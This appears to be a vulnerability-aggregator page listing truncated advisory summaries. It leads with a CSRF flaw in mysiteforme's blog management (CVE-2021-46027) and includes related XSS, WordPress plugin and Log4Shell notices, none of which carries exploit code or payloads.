CVE-2021-46027

mysiteforme, as of 19-12-2022, has a CSRF vulnerability in the background blog management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, a blog tag will be added...

CVE-2021-46027

CVE-2021-46027 concerns a CSRF vulnerability in the background blog management of mysiteforme . The description across sources states an attacker can craft a malicious link and, when a site administrator clicks it, a blog tag is added, indicating a cross-site request forgery in the backend admini...

PT-2022-12512 · Unknown · Mysiteforme

Name of the Vulnerable Software and Affected Versions: mysiteforme affected versions not specified Description: The issue concerns a CSRF vulnerability in the background blog management of mysiteforme. An attacker can construct a malicious link that, when clicked by an administrator, results in t...

Mysiteforme 跨站请求伪造漏洞

Mysiteforme is a permission management system. A cross-site request forgery vulnerability exists in mysiteforme, which stems from a lack of validation for cross-site request forgery in the backend blog administration. An attacker could use a forged malicious request to trick a victim into clickin...

Mysiteforme 跨站脚本漏洞

Mysiteforme is a permission management system. mysiteforme suffers from a cross-site scripting vulnerability that stems from the lack of user-supplied data and output data validation filtering in the blog tagging function of the backend blog management. An attacker could exploit the vulnerability...

Microservice Security: How to Proactively Protect Apps

Microservices are growing in popularity—how can development teams embed seamless security into the entire pipeline? Fernando Cardoso, solutions architect at Trend Micro, breaks it down for you...

PT-2022-12511 · Unknown · Mysiteforme

Name of the Vulnerable Software and Affected Versions: mysiteforme affected versions not specified Description: The issue concerns a Cross Site Scripting XSS vulnerability via the add blog tag function in the background blog management. This allows for potential malicious script execution...

blog.useberry.com Cross Site Scripting vulnerability OBB-2336986

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Security Bulletin: Apache Log4j vulnerability affects IBM Cloud Pak for Automation (CVE-2021-44228)

Summary A remote code execution vulnerability has been reported for log4j-core-2.x libraries, which are used in various components of IBM Cloud Pak for Business Automation. Vulnerability Details CVEID:CVE-2021-44228 DESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code...

Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak: I’m giving an online-only talk on “Securing a World of Physically Capable Computers” as part of Teleport’s Security Visionaries 2022 series, on January 18, 2022. I’m speaking at IT-S Now 2022 in Vienna on June 2, 2022. I’m speaking...

blog.mercy.com Cross Site Scripting vulnerability OBB-2333444

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Halo 跨站脚本漏洞

Halo is a personal blogging system for individual developers. Halo suffers from a cross-site scripting vulnerability, which stems from the lack of proper validation of client-side data in the WEB application, and can be exploited by an attacker to execute client-side code...

blog.barre3.com Cross Site Scripting vulnerability OBB-2331068

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Cross site request forgery (csrf)

The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a...

CVE-2021-25032

The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin’s settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a...

CVE-2021-25032

The CVE concerns the WordPress plugins PublishPress Capabilities and PublishPress Capabilities Pro (versions before 2.3.1). The issue stems from missing authorization and CSRF checks when updating plugin settings via the init hook, and failure to validate that updated options belong to the plugin...

Microsoft Sees Rampant Log4j Exploit Attempts, Testing

No surprise here: The holidays bought no Log4Shell relief. Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library. “We have...

WordPress TrustMate.io – integracja z WooCommerce plugin <= 1.7.0 - Arbitrary Blog Option Update vulnerability

Arbitrary Blog Option Update vulnerability discovered by WPScanTeam in WordPress TrustMate.io – integracja z WooCommerce plugin versions = 1.7.0. Solution Update the WordPress TrustMate.io – integracja z WooCommerce plugin to the latest available version at least 1.7.1...

Top 5 DevOps Resource Center Articles of 2021

We look back on the 5 most popular DevOps Resource Center articles in 2021 to help you build at your best in 2022...

Mitigating Log4Shell and Other Log4j-Related Vulnerabilities

Summary The Cybersecurity and Infrastructure Security Agency CISA, the Federal Bureau of Investigation FBI, National Security Agency NSA, Australian Cyber Security Centre ACSC, Canadian Centre for Cyber Security CCCS, the Computer Emergency Response Team New Zealand CERT NZ, the New Zealand...